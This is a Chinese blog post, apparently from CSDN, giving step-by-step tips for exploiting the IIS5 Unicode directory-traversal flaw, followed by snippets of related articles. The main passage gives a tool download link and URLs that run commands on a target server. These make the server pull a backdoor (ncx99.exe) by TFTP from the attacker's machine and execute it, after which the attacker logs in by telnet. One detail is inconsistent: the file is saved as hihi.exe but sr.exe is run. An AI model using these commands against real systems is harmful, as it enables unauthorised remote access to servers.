IIS5 UNICODE 编码漏洞的利用心得补充

最新推荐文章于 2022-02-23 15:02:25 发布
原创 最新推荐文章于 2022-02-23 15:02:25 发布 · 711 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#iis #c

博客介绍了在本机运行tftpd32.exe后,通过特定链接将本机的ncx99.exe上传到对方的scripts下,接着执行相关程序,可在tftp上看到对方ip信息,最后可使用telnet或SecureCRT.EXE软件登陆指定ip。
我来说说用tftp怎么搞:
下载http://www.cners.com/tools/unicode.zip(下载快着呢)
解压:
tftpd32.exe
ncx99.exe

本机运行tftpd32.exe
再(接着你的来):

http://192.168.8.48/scripts/ccc.exe?/c+tftp -i 本地ip GET ncx99.exe c://inetpub//scripts//hihi.exe

注意了:这是将你本机的ncx99.exe 上传到对方的 scripts下!
下面执行它:
http://192.168.8.48/scripts/ccc.exe?/c+c:/inetpub/scripts/sr.exe

这时在你的tftp上就能看到对方ip的信息了!

下面可以干的就不用说了!

用telnet 或SecureCRT.EXE软件登陆192.168.8.48就可以了!(推荐用SecureCrt)

 

 

Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 6549
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
WebDav漏洞简单分析及通用exploit设计
FreeXploiT
10-29 2362
WebDav漏洞简单分析及通用exploit设计    拜读了isno写的>、>,以及Nankia写的>之后,用他们发布的exploit、以及能在网上找到的exploit在我的一些测试机上测试,有些成功,有些不成功。于是便想自己调试一下。在后来的调试过程中,参考了大量资料,特别是yuange所写的>。在这过程中我学到了很多东西,自己也有些心得体会,其中可能有不少错误的地方,于是便想写下来,一来请各
IIS5 UNICODE 编码漏洞利用心得
immcss的专栏
03-31 866
   大家一定都知道那个风光了非常久的iis5 unicode 编码漏洞吧。没办法,第一篇教程不知道写什么好,随便先凑合着, 就写一下这个漏洞的攻击心得吧。 1 首先我们来看看这个漏洞的原理。 在中文版的iis4,和iss5中,存在一个bug,原因是unicode编码 存在bug 在unicode 编码中,发现了一个奇怪的编码方 式, 例如: %c1%hh %c0%hh (0x00〈= 0xh
Windows系统漏洞学习总结
热门推荐
bcbobo21cn的专栏
04-01 1万+
Windows系统常见漏洞分析   由于windows NT/2000操作系统的普及率和市场占有率比较高,所以很容易使它成为很多黑客攻击的目标。目前,Windows NT/2000最主要的漏洞Unicode漏洞、.ida/.idq缓冲区溢出漏洞、Microsoft IIS CGI文件名错误解码漏洞、MSADCS RDS弱点漏洞、FrontPage服务器扩展和.Printer漏洞等等。下面笔者将
软件漏洞分析入门
whatday的专栏
09-23 1万+
1 引子 To be the apostrophe which changed “Impossible” into “I’m possible” —— failwest 凉风有讯,秋月无边。 您是否梦想过能够像电影上演的那样黑进任意一台机器远程操控?您的梦想是否曾经被书店里边满架子的反黑,防毒,擒木马的扫盲书强暴的体无完肤? 从今天开始,准备陆续发一系列关于软件漏洞方面基础知识的帖子,包括软件漏洞...
Web安全期末复习
kaisaooo的博客
07-02 6892
目录前言知识点Web应用开发基础Web信息收集Web漏洞扫描SQL注入文件上传攻击跨站脚本攻击(XSS)跨站请求伪造命令执行漏洞Web Server配置安全认证和授权日志系统构建及日志分析实战与综合简答题复习要点ASP.NET的安全控件web应用系统的数据加密数据库安全通信身份验证日志分析安全配置一套习题 前言 本文用来记录Web安全的复习资料,大部分内容都是从老师ppt的复习范围中节选的,可能不太全,经过考试的心得:有时间的可以多看看,考的比较杂啥都有,但是SQL注入、XSS、文件上传漏洞是重中之重。有
SQL 注入
lrj2005的专栏
11-18 561
转自:http://blog.youkuaiyun.com/lin_lujian/article/details/6978325    最近很关注sql注入的继续,找了一些资料和自己的一些心得写出来     随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性
防止sql注入----------------项目不得不考虑的一颗毒瘤
幸福的猪的专栏
11-18 2469
最近很关注sql注入的继续,找了一些资料和自己的一些心得写出来 随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL I
Web安全工程师成长路线
sanMu_blog的博客
06-24 9552
Web安全工程师 职位描述: 对公司网站、业务系统进行安全评估测试(黑盒、白盒测试);对公司各类系统进行安全加固;对公司安全事件进行响应,清理后门,根据日志分析攻击途径;安全技术研究,包括安全防范技术,黑客技术等;跟踪最新漏洞信息,进行业务产品的安全检查。 职位要求: 熟悉主流的Web安全技术,...
MD5不可逆加密算法的ASP实现实例
10-14 1172
此为国外转载函数,可将任意字符转换为md5 16为字符加密形式,而且为不可逆转换。Private Const BITS_TO_A_BYTE = 8Private Const BYTES_TO_A_WORD = 4Private Const BITS_TO_A_WORD = 32 Private m_lOnBits(30)Private m_l2Power(30)Private Func
asp作品保护方案
10-18 1001
自从ASP(Active Server Pages)问世以来,因其可以创建健壮易于维护、与平台无关的应用系统,ASP技术受到了越来越多网络程序员的喜爱,使用ASP从事WEB开发的人也越来越多。但ASP只是一种非编译型的、在服务端运行的脚本语言,采用明文(plain text)方式来编写,即使采用了ASP加密程序对ASP源码进行加密,也不一定能保证发布到运行环境中去的ASP应用程序不被非法拷贝。对于
在两个小时内成功破解6、7个网站后才发现……
07-13 851
原来这个叫做sql注入漏洞,而且已公布很久了,但是还是有这么多网站中招,说明大家安全意识还不够强:(并不是漏洞,主要是程序上的漏洞,而且读出来的都是明文,密码根本都没加密:(建议大家把密码采用md5方式加密再存入数据库,而且要把密码位数设长一些,这样被破解的可能性小很多很多
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 1万+
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
IIS短文件名漏洞一键利用工具发布
IIS短文件名漏洞利用工具是一种自动化攻击工具,其核心功能是扫描服务器上存在的短文件名漏洞利用漏洞执行攻击者设定的操作,例如读取、修改、删除文件等。其操作通常十分简单,只需要使用者提供目标服务器的IP...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值